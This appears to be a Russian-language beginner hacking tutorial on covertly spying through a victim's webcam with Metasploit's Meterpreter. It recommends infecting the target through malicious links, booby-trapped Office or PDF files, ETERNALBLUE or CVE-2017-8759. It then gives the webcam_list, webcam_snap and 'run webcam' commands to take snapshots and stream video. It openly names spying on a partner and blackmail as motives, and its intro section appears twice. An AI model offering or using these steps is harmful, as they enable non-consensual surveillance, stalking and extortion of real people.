Добро пожаловать обратно, мои хакеры-новички!
Как и в моей предыдущей статье об удалённой установке кейлоггера на чужой компьютер, в этом руководстве мы продолжим демонстрировать возможности мощного инструмента Meterpreter из Metasploit, взломав веб-камеру жертвы. Это позволит нам удалённо управлять веб-камерой, делая снимки с неё.
Зачем вам взламывать чью-то веб-камеру? Возможно, вы подозреваете свою вторую половинку в интрижке, или, может быть, вы занимаетесь шантажом. Или, может быть, вы просто извращенец. Но моя настоящая цель — показать, насколько это просто, чтобы вы знали, что это возможно, и могли защитить себя.
В отличие от простой установки командной оболочки на компьютер жертвы, Meterpreter обладает возможностями выполнять множество практически неограниченных действий на компьютере жертвы. Главное — сначала установить Meterpreter на компьютер жертвы.
Я уже показывал, как это сделать, в некоторых своих предыдущих статьях. Можно заставить жертву перейти по ссылке на наш вредоносный сайт, отправить вредоносный документ Microsoft Office или файл Adobe Acrobat и многое другое. Вероятно, проще всего использовать эксплойт ETERNALBLUE от АНБ, портированный для Metasploit, против непатченной системы Windows 7 или эксплойт CVE-2017-8759 против любой системы Windows.
Итак, теперь запустим Metasploit и установим Meterpreter на систему жертвы. После этого мы сможем просматривать и захватывать изображения с её веб-камеры.
meterpreter > webcam_list
Если у него/нее есть веб-камера, система выдаст список всех веб-камер.
meterpreter > webcam_snap
Теперь система сохранит снимок с ее веб-камеры в нашей системе в каталоге /opt/framework3/msf3, который мы можем открыть и посмотреть, что происходит.
Качество сохраненного изображения зависит от веб-камеры вашей жертвы и окружающей обстановки.
meterpreter > run webcam -p /var/www
Эта команда запускает веб-камеру и отправляет потоковое видео на /var/www/webcam.htm. Вы можете просмотреть видео, загрузив этот файл практически в любое приложение для просмотра видео.
Как и в моей предыдущей статье об удалённой установке кейлоггера на чужой компьютер, в этом руководстве мы продолжим демонстрировать возможности мощного инструмента Meterpreter из Metasploit, взломав веб-камеру жертвы. Это позволит нам удалённо управлять веб-камерой, делая снимки с неё.
Зачем вам взламывать чью-то веб-камеру? Возможно, вы подозреваете свою вторую половинку в интрижке, или, может быть, вы занимаетесь шантажом. Или, может быть, вы просто извращенец. Но моя настоящая цель — показать, насколько это просто, чтобы вы знали, что это возможно, и могли защитить себя.
В отличие от простой установки командной оболочки на компьютер жертвы, Meterpreter обладает возможностями выполнять множество практически неограниченных действий на компьютере жертвы. Главное — сначала установить Meterpreter на компьютер жертвы.
Я уже показывал, как это сделать, в некоторых своих предыдущих статьях. Можно заставить жертву перейти по ссылке на наш вредоносный сайт, отправить вредоносный документ Microsoft Office или файл Adobe Acrobat и многое другое. Вероятно, проще всего использовать эксплойт ETERNALBLUE от АНБ, портированный для Metasploit, против непатченной системы Windows 7 или эксплойт CVE-2017-8759 против любой системы Windows.
Итак, теперь запустим Metasploit и установим Meterpreter на систему жертвы. После этого мы сможем просматривать и захватывать изображения с её веб-камеры.
Шаг 1. Перечислите веб-камеры жертвы
Meterpreter в Metasploit имеет встроенный модуль для управления веб-камерой удалённой системы. Первое, что нам нужно сделать, — это проверить наличие веб-камеры, и если да, получить её имя. Это можно сделать, набрав:meterpreter > webcam_list
Если у него/нее есть веб-камера, система выдаст список всех веб-камер.
Шаг 2. Сделайте снимки с веб-камеры жертвы
Теперь, когда мы знаем, что у него/нее есть веб-камера, мы можем сделать снимок с веб-камеры, введя:meterpreter > webcam_snap
Теперь система сохранит снимок с ее веб-камеры в нашей системе в каталоге /opt/framework3/msf3, который мы можем открыть и посмотреть, что происходит.
Качество сохраненного изображения зависит от веб-камеры вашей жертвы и окружающей обстановки.
Шаг 3. Посмотрите потоковое видео с веб-камеры жертвы.
Теперь, когда мы знаем, как сделать один снимок с веб-камеры жертвы, нам нужно запустить её, чтобы смотреть непрерывный видеопоток. Для этого наберите:meterpreter > run webcam -p /var/www
Эта команда запускает веб-камеру и отправляет потоковое видео на /var/www/webcam.htm. Вы можете просмотреть видео, загрузив этот файл практически в любое приложение для просмотра видео.
